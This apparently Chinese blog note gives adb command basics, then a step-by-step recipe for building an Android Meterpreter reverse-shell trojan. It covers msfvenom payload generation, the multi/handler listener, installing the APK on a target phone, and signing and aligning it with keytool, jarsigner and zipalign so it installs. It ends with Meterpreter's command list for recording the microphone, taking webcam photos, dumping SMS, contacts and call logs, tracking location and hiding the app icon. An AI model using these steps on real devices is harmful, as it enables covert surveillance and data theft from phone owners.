msf+android
msf android
0.adb命令
查看当前连接设备:
- 查看当前连接设备:
adb devices
- 如果发现多个设备:
adb -s 设备号 其他指令
举例:
adb -s devicel install xxx.apk
查看顶部Activity:
- windows环境下:
adb shell dumpsys activity | findstr "mFocusedActivity"
- Linux、Mac环境下:
adb shell dumpsys activity | grep "mFocusedActivity"
查看日志:
adb logcat
安装apk文件:
adb install xxx.apk
- 此安装方式,如果已经存在,无法安装;
推荐使用覆盖安装:
adb install -r xxx.apk
- 比分直接RUN出来的包是test-onlu的无法安装,推荐使用-t
adb install -r -t xxx.apk
卸载App:
adb uninstall com.zhy.app
- 如果想要保留数据,则:
adb uninstall -k com.zhy.app
传递文件:
- 往手机SDCard传递文件:
adb push 文件名 手机端SDCard路径
例如:
adb push 帅照.jpg /sdcard/
- 从手机端下载文件:
adb pull /sdcard/xxx.txt
查看手机端安装的所有app包名:
adb shell pm list packages
启动Activity:
adb shell am start 包名/完整Activity路径
例如:
adb shell am start com.zhy.aaa/com.zhy.aaa.MainActivity
- 如果需要携带参数(携带一个Intent,Key 为name):
adb shell am start com.zhy.aaa/com.zhy.aaa.MainActivity -e name zhy
- 启动一个隐式的Intent:
adb shell am start -a "android.intent.action,VIEW" -d "https://www.google.com"
发送广播:
adb shell am broadcast -a "broadcastactionfilter"
-如果需要携带参数(携带一个Intent,key为name):
adb shell am broadcast -a "broadcastactionfilter" -e name zhy
启动服务:
adb shell am startservice "com.zhy.aaa/com.zhy.aaa.MyService"
屏幕截图:
- 可以使用screencap命令来进行手机屏幕截图,例如:
adb shell screencap /sdcard/screen.png
录制视频:
可以使用screenrecord[options] filename命令来录制屏幕视频,例如:
adb shell screenrecord /sdcard/demo.mp4
1.环境
- Kali Linux20 192.168.31.199
- Huawei nova3 192.168.31.90
-
adb安装
apt-get install android-tools-fastboot apt-get install android-tools-adb
adb connect连接问题
开发者模式打开usb调试,数据线连接电脑
华为手机:拨号键输入 ##2846579## 进入工程菜单, 进入后台设置 ,点击USB端口修改生产模式
2.木马生成
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.68 LPORT=5555 R > apk.apk
3.安装
adb root
adb remount
adb push apk路径 system/app
但是华为无缘root,只能手动
4.连接
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.68
set LPORT 5555
exploit
5.数字签名
1.使用msfvenom生成apk木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > lhw.apk
P 攻击payload
LHOST = 接收反弹连接主机
LPORT = 接收反弹连接主机的监听端口
然后是路径生成路径
2.keytools (密钥、证书管理工具)
首先使用keytools生成创建证书:
keytool -genkey -v -keystore apk-trojan-key.keystore -alias tempt -keyalg RSA -keysize 1024 -validity 999
-v 显示密钥库中的证书详细信息
-k eystore 指定密钥库的名称
-alias 产生别名(注意:要和下一步签名apk的别名一致,因为这个就是对lhw.apk的数字证书)
-keyalg 指定密钥的算法(默认为DSA)
-keysize 指定密钥长度
-validity 指定创建的证书有效期多少天(默认90)
3.Jarsigner(jar签名、校验工具)
然后使用jarsigner进行签名:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore lhw.apk tempt
-verbose 签名/验证时输出详细信息
-sigalg 签名算法的名称
-digestalg 摘要算法的名称
-keystore 密钥库位置
进行签名文件+别名(并不是生成一个别名文件)
使用-verify对文件签名验证(本机可以不用验证,手机安装时肯定要验签)
jarsigner -verify -verbose lhw.apk
4.Zipalign(APK优化攻击)需安装
使用Zipalign优化apk,忘掉这一步部分手机会无法安装,
zipalign -v 4 lhw.apk jxb.apk
命令
- 麦克风
-record_mic 从麦克风huhugb录制音频X秒
-h 帮助
-d 记录秒数
-F 音频保存路径,默认 HOME/xxxx.wav
-p 自动播放捕获的音频 - webcam_list 列出手机摄像头个数
- webcam_snap 从指定摄像头拍摄照片
-h 帮助
-I 选择要使用的摄像头
-p 图片路径,默认HOME/xxxx.jpeg
-q 图片质量,默认为50
-v 自动查看图片 - webcam_chat 开始视频聊天
- webcam_stream 从摄像拍摄视频
https://www.cnblogs.com/hugboy/p/13419956.html
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
localtime Displays the target system local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Android Commands
================
Command Description
------- -----------
activity_start Start an Android activity from a Uri string
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
hide_app_icon Hide the app icon from the launcher
interval_collect Manage interval collection capabilities
send_sms Sends SMS from target session
set_audio_mode Set Ringer Mode
sqlite_query Query a SQLite database from storage
wakelock Enable/Disable Wakelock
wlan_geolocate Get current lat-long using WLAN information
Application Controller Commands
===============================
Command Description
------- -----------
app_install Request to install apk file
app_list List installed apps in the device
app_run Start Main Activty for package name
app_uninstall Request to uninstall application
浙公网安备 33010602011771号